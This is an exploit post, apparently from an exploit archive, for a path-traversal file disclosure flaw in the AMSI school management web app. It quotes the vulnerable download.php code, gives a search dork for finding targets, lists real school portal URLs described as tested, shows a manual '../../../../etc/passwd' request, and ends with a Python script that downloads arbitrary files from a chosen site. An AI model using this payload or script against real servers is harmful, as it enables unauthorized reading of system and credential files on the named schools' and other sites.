AMSI v3.20.47 build 37 <= Remote File Disclosure Exploit (.py)

AMSI v3.20.47 build 37 <= Remote File Disclosure Exploit (.py)
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockout@e-mail.com.tr
[~] Exploit Developed by : B3mB4m
[~] HomePage :  http://h4x0resec.blogspot.com
[~] Guzel Insanlar :  ZoRLu, ( milw00rm.com ), 
                      Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor, 
                      DaiMon, PRoMaX, alpican, EthicalHacker, BurakGrs
###########################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : AMSI ( Academia management solutions international )
|~Affected Version : v3.20.47 build 37
|~Software  : http://amsi.ae - http://iconnect.ae
|~RISK : Medium
|~Google Keyword/Dork :  inurl:"?load=news/search_news"
|~Tested On : [L] Kali Linux \ [R] example sites
####################INFO################################
makes it possible to read all the files from the local base.
 #######################################################
 
### Error Line in 'download.php' ## 
 
..
    $path   =   str_replace('/download.php?file=','',$_SERVER['REQUEST_URI']);   
    // $path = $_GET['file']; 
    header("Content-Description: File Transfer");
    header("Content-Type: application/force-download");
    //header("Content-Disposition: attachment; filename=" . basename($path . $uri[1]));
    header("Content-Disposition: attachment; filename=\"" . basename($path . $uri[1]) . "\"" );

    @readfile($path);
..
########################################################
Example and tested on;
 
http://portal.iconnect.ae/
http://demo.iconnect.ae/
http://barsha.almawakeb.sch.ae/
http://portal.naischool.ae/
http://portal.ias-dubai.ae/
http://portal.madarschool.ae/
http://portal.isas.sch.ae/
http://portal.alsanawbarschool.com/
http://fia.fischools.com/
http://portal.ajyal.sch.ae/
http://portal.arabunityschool.com/
http://alnashaa.sch.ae/
http://portal.aaess.com/
 
############################################################
Manual Exploitation; http://$VICTIM/download.php?file=../../../../etc/passwd
############################################################
=========Automatic File Source Downloader Exploit ========
##################### exploit.py ##############################

# Coded by b3mb4m 
 
import random
import os
import urllib

class B3mB4m(object):
 def example(self):
  print """

  How to use ? 
   Website:  http://VICTIM.com
   Path : /download.php?file=../../../../etc/passwd
  """ 
  
 def exploit(self):
  ask = raw_input("Website :")
  uz = raw_input("Path : ")

  #ask = "http://alnashaa.sch.ae"
  #uz = "/download.php?file=../../../../etc/passwd"

  uniq = str(random.randrange(1,1000+1))+".txt"
  filee = ask+uz

  try:
   urllib.urlretrieve(filee, uniq); 
   print "\t\nDownload complate ! "
   os.startfile(uniq)
  except:
   B3mB4m().example() 


if __name__ == '__main__':
 B3mB4m().exploit()